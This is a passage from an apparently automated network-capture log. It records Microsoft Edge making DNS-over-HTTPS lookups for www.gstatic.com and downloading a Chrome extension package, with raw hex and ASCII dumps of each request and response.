                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:35 GMT
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        CF-RAY: 8e5c56604af48cec-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        31192.168.2.549806172.64.41.34437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:35 GMT
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        CF-RAY: 8e5c56604fa15e7e-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f0 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomPC)


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        32192.168.2.549788172.217.18.14437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC566INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Length: 138356
                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC7HpoDVkGtCfawXuedSM4Xz-3h25UxkmUDS0AgIOucYNTxAqScRIgbRNzM6rmGZvExZ2qI
                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 16:45:00 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 20 Nov 2025 16:45:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        Age: 25475
                                                                                                                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                        ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC824INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                        Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC1390INData Raw: 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c 7c a7 3d 83 9c c3 33
                                                                                                                                                                                                                                                        Data Ascii: :__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\|=3
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC1390INData Raw: 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc 55 5e 3d b8 46 34 c8
                                                                                                                                                                                                                                                        Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FSU^=F4
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC1390INData Raw: 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 ce c6 ac 26 ca 94 9e
                                                                                                                                                                                                                                                        Data Ascii: }oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~&
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC1390INData Raw: ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 af 7f ff d5 d4 85 ac
                                                                                                                                                                                                                                                        Data Ascii: c$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC1390INData Raw: c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4 bf e3 99
                                                                                                                                                                                                                                                        Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC1390INData Raw: 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea ff 64 31
                                                                                                                                                                                                                                                        Data Ascii: n=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@(d1
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC1390INData Raw: 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98 fd 47 dc
                                                                                                                                                                                                                                                        Data Ascii: cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6G
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC1390INData Raw: 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65 73 2e 6a
                                                                                                                                                                                                                                                        Data Ascii: o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/messages.j
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC1390INData Raw: 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        33192.168.2.549804172.64.41.34437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:35 GMT
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        CF-RAY: 8e5c56604890424b-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ed 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        34192.168.2.549809172.64.41.34437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:35 GMT
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        CF-RAY: 8e5c56617e3242ee-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 ac d9 a5 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom')


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        35192.168.2.549810172.64.41.34437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
